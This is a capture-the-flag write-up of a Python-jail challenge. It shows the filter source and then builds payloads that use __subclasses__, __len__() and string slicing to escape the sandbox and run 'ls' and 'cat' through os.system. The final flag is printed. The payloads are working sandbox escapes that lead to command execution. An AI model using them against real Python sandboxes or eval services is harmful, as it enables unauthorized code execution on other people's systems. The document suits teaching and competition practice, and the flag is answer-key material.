Misc

Monkey's Paw (384 pts)

Description

I wish these modern pyjails would let me use dunders more..

Solution

This challenge is a pyjail. The objective is to achieve RCE on the server by bypassing a blacklist.

#!/usr/local/bin/python3.13 -S

def die():
    print("Don't be greedy")
    exit(1)


def check_code(code):
    to_check = ["co_consts", "co_names",
                "co_varnames", "co_freevars", "co_cellvars"]
    for attr in to_check:
        for obj in getattr(code, attr):
            if type(obj) is not str or \
                    len(obj) < 5 or \
                    obj[:2] + obj[-2:] != '____':
                die()


code = input("Be careful what you wish for: ")
if "\"'" in code:
    die()

code = compile(code, "<string>", "eval")
check_code(code)
eval(code, {'__builtins__': {}})

There are five protections implemented in the code. The details are below (simplified explanation):

  • Line 13: Values other than function or attribute names can only be strings (we can't use integers, etc.)

  • Line 14: The length of every value must be greater than 4

  • Line 15: Every value must start and end with __

  • Line 20: The input cannot contain the exact sequence "'

  • Line 25: Built-in functions are removed

My teammate (daffainfo) sent a payload that would work without the blacklist (1-4).

"().__class__.__base__.__subclasses__()[116].__init__.__builtins__['__import__']('os').__getattribute__('system')('ls')"

My task was to convert the payload so that it works with the blacklist. Here is the bypass idea:

  • To get an integer value, we can use __len__()

  • To use string values that don't have "__", we can use padding and index subscripting
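
Why the filter misses this, as an added example that is not part of the original write-up: check_code is re-implemented here as a reporting function (the names violations, accepted and runtime_value are made up for this sketch), and it is run over two constructed inputs built from fragments shown on this page. The check only sees compile-time literals and names, so a value derived at runtime by __len__() and slicing never appears in the fields it inspects.

```python
# Added example: the challenge's check_code, rewritten to report instead of exit.
FIELDS = ("co_consts", "co_names", "co_varnames", "co_freevars", "co_cellvars")


def violations(expr):
    """Return (field, value) pairs in expr that the checks on lines 13-15 reject."""
    code = compile(expr, "<string>", "eval")
    bad = []
    for field in FIELDS:
        for obj in getattr(code, field):
            if type(obj) is not str or len(obj) < 5 or obj[:2] + obj[-2:] != "____":
                bad.append((field, obj))
    return bad


def accepted(expr):
    """Mirror the whole gate: the quote check on line 20, then check_code."""
    return "\"'" not in expr and not violations(expr)


def runtime_value(expr):
    """Evaluate an accepted expression with empty builtins, as line 25 does."""
    if not accepted(expr):
        raise ValueError("rejected by the filter")
    return eval(compile(expr, "<string>", "eval"), {"__builtins__": {}})


# Constructed inputs (only PADDED is ever evaluated; it is pure string slicing).
PLAIN = "__builtins__['__import__']('os')"  # the short literal 'os' is visible
PADDED = "'{0}os{1}'['{0}'.__len__():'{2}'.__len__()]".format(
    "_" * 6, "_" * 5, "_" * 8)  # same padding widths as the payload on this page

if __name__ == "__main__":
    print("plain :", violations(PLAIN))
    print("padded:", violations(PADDED), "->", runtime_value(PADDED))
```

A filter that has to hold against this needs to constrain what the expression can do at runtime, not only which literals and names appear in the code object.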

Below is the converted payload:

  • Run ls

__builtins__.__class__.__base__.__subclasses__()["____________________________________________________________________________________________________________________".__len__()].__init__.__builtins__['__import__']('______os_____'["______".__len__():"________".__len__()]).__getattribute__('______system_____'["______".__len__():"____________".__len__()])('______ls_____'["______".__len__():"________".__len__()])

  • Run cat flag_RRkxxMoAAG3mQpoq.txt

__builtins__.__class__.__base__.__subclasses__()["____________________________________________________________________________________________________________________".__len__()].__init__.__builtins__['__import__']('______os_____'["______".__len__():"________".__len__()]).__getattribute__('______system_____'["______".__len__():"____________".__len__()])('______cat flag_RRkxxMoAAG3mQpoq.txt_____'["______".__len__():"___________________________________".__len__()])

Flag: INTIGRITI{y0ur_w15h_w45_6r4n73d_bu7_47_wh47_c057}
